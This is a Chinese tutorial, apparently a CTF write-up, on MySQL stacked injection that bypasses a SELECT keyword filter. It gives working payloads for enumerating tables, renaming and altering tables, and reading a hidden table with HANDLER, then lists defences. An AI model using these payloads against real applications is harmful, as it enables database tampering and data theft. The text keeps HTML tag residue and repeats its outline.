MySQL 注入进阶：堆叠注入与 HANDLER 命令详解<\/h1>

1. 注入检测与初步分析<\/h2>

1.1 注入点检测<\/h3>

使用引号检测注入点：1'<\/code> 导致报错，表明可能存在 SQL 注入<\/li>

判断列数：1' order by 4 -- q<\/code> 报错，1' order by 2 -- q<\/code> 正常，确认存在 2 列输出<\/li>
<\/ul>
1.2 联合注入尝试<\/h3>

尝试联合注入：1' union select 1,2 -- q<\/code><\/li>
发现被过滤的关键字：select|update|delete|drop|insert|where|\.\/i<\/code><\/li>
<\/ul>
2. 堆叠注入利用<\/h2>
2.1 发现堆叠注入<\/h3>

成功执行：1' ; show databases; -- w<\/code><\/li>
查看当前数据库表：-1' ; show tables; -- w<\/code><\/li>
<\/ul>
2.2 表结构分析<\/h3>

查看 words 表结构：-1' ; show columns from words ; -- w<\/code><\/li>
发现 words 表包含 id 和 data 列<\/li>
<\/ul>
3. 高级注入技术：表重命名与修改<\/h2>
3.1 表重命名技术<\/h3>
rename<\/span> `<\/span>words`<\/span> to<\/span> `<\/span>words1`<\/span>; 
<\/span><\/span>rename<\/span> `<\/span>1919810931114514<\/span>`<\/span> to<\/span> `<\/span>words`<\/span>;
<\/span><\/span><\/code><\/pre>3.2 修改表结构<\/h3>
alter<\/span> table<\/span> `<\/span>words`<\/span> change `<\/span>id`<\/span> `<\/span>flag`<\/span> varchar(100<\/span>);
<\/span><\/span><\/code><\/pre>4. ALTER 命令详解<\/h2>
ALTER 命令用于修改数据库、表和索引等对象的结构：<\/p>
4.1 常用 ALTER 操作<\/h3>


添加列：<\/p>
alter<\/span> table<\/span> [table_name<\/span>] add<\/span> column<\/span> [new_column] [datatype];
<\/span><\/span><\/code><\/pre><\/li>

修改数据类型：<\/p>
alter<\/span> table<\/span> [table_name<\/span>] modify<\/span> column<\/span> [column_name<\/span>] [datatype];
<\/span><\/span><\/code><\/pre><\/li>

修改列名：<\/p>
alter<\/span> table<\/span> [table_name<\/span>] change column<\/span> [old_column_name] [new_column_name] [datatype];
<\/span><\/span><\/code><\/pre><\/li>

删除列：<\/p>
alter<\/span> table<\/span> table_name<\/span> drop<\/span> column<\/span> [column_name<\/span>];
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
4.2 数据去重技术<\/h3>
-- 创建临时表
<\/span><\/span><\/span><\/span>create<\/span> table<\/span> [tmp] select<\/span> *<\/span> from<\/span> [table_name_] group<\/span> by<\/span> ([col1],[col2]);
<\/span><\/span>
<\/span><\/span>-- 删除原表
<\/span><\/span><\/span><\/span>drop<\/span> table<\/span> [table_name_];
<\/span><\/span>
<\/span><\/span>-- 重命名临时表
<\/span><\/span><\/span><\/span>alter<\/span> table<\/span> tmp rename<\/span> table_name_;
<\/span><\/span>-- 或
<\/span><\/span><\/span><\/span>rename<\/span> tmp table_name_;
<\/span><\/span><\/code><\/pre>5. HANDLER 命令高级用法<\/h2>
HANDLER 是 MySQL 特有命令，用于逐行读取表数据。<\/p>
5.1 基本用法<\/h3>
-- 打开句柄
<\/span><\/span><\/span><\/span>handler<\/span> `<\/span>table_name<\/span>`<\/span> open<\/span>;
<\/span><\/span>
<\/span><\/span>-- 读取第一行
<\/span><\/span><\/span><\/span>handler<\/span> `<\/span>table_name<\/span>`<\/span> read<\/span> first<\/span>;
<\/span><\/span>
<\/span><\/span>-- 读取下一行
<\/span><\/span><\/span><\/span>handler<\/span> `<\/span>table_name<\/span>`<\/span> read<\/span> next<\/span>;
<\/span><\/span>
<\/span><\/span>-- 关闭句柄
<\/span><\/span><\/span><\/span>handler<\/span> `<\/span>table_name<\/span>`<\/span> close<\/span>;
<\/span><\/span><\/code><\/pre>5.2 带索引的 HANDLER 操作<\/h3>
-- 创建索引
<\/span><\/span><\/span><\/span>create<\/span> index<\/span> handler_index on<\/span> handler_table(id);
<\/span><\/span>
<\/span><\/span>-- 打开带别名的句柄
<\/span><\/span><\/span><\/span>handler<\/span> handler_table open<\/span> as<\/span> p;
<\/span><\/span>
<\/span><\/span>-- 使用索引读取
<\/span><\/span><\/span><\/span>handler<\/span> p read<\/span> handler_index first<\/span>;
<\/span><\/span>handler<\/span> p read<\/span> handler_index next<\/span>;
<\/span><\/span>handler<\/span> p read<\/span> handler_index prev;
<\/span><\/span>handler<\/span> p read<\/span> handler_index last<\/span>;
<\/span><\/span>
<\/span><\/span>-- 关闭句柄
<\/span><\/span><\/span><\/span>handler<\/span> p close<\/span>;
<\/span><\/span><\/code><\/pre>5.3 索引管理<\/h3>
-- 删除索引
<\/span><\/span><\/span><\/span>alter<\/span> table<\/span> handler_table drop<\/span> index<\/span> handler_index;
<\/span><\/span>
<\/span><\/span>-- 重新创建索引
<\/span><\/span><\/span><\/span>create<\/span> index<\/span> handler_index on<\/span> handler_table(id);
<\/span><\/span><\/code><\/pre>6. 实际注入案例<\/h2>
6.1 最终注入 payload<\/h3>
1<\/span>' ; handler `1919810931114514` open ; handler `1919810931114514` read first -- w
<\/span><\/span><\/span><\/code><\/pre>6.2 技术要点<\/h3>

通过堆叠注入绕过关键字过滤<\/li>
利用表重命名技术将目标表伪装成应用预期查询的表<\/li>
使用 HANDLER 命令直接读取表数据，绕过 SELECT 限制<\/li>
通过 ALTER 命令修改表结构以适应应用查询逻辑<\/li>
<\/ol>
7. 防御建议<\/h2>

禁用堆叠查询功能<\/li>
使用预处理语句<\/li>
实施最小权限原则<\/li>
过滤特殊字符和 SQL 关键字<\/li>
限制数据库用户权限，避免 ALTER 等危险操作<\/li>
<\/ol>

MySQL 注入进阶：堆叠注入与 HANDLER 命令详解<\/h1>

1. 注入检测与初步分析<\/h2>

2. 堆叠注入利用<\/h2>

3. 高级注入技术：表重命名与修改<\/h2>

4. ALTER 命令详解<\/h2> ALTER 命令用于修改数据库、表和索引等对象的结构：<\/p>

5. HANDLER 命令高级用法<\/h2> HANDLER 是 MySQL 特有命令，用于逐行读取表数据。<\/p>

6. 实际注入案例<\/h2>

7. 防御建议<\/h2> 禁用堆叠查询功能<\/li> 使用预处理语句<\/li> 实施最小权限原则<\/li> 过滤特殊字符和 SQL 关键字<\/li> 限制数据库用户权限，避免 ALTER 等危险操作<\/li> <\/ol>

4. ALTER 命令详解<\/h2>
ALTER 命令用于修改数据库、表和索引等对象的结构：<\/p>

5. HANDLER 命令高级用法<\/h2>
HANDLER 是 MySQL 特有命令，用于逐行读取表数据。<\/p>

7. 防御建议<\/h2>

禁用堆叠查询功能<\/li>
使用预处理语句<\/li>
实施最小权限原则<\/li>
过滤特殊字符和 SQL 关键字<\/li>
限制数据库用户权限，避免 ALTER 等危险操作<\/li> <\/ol>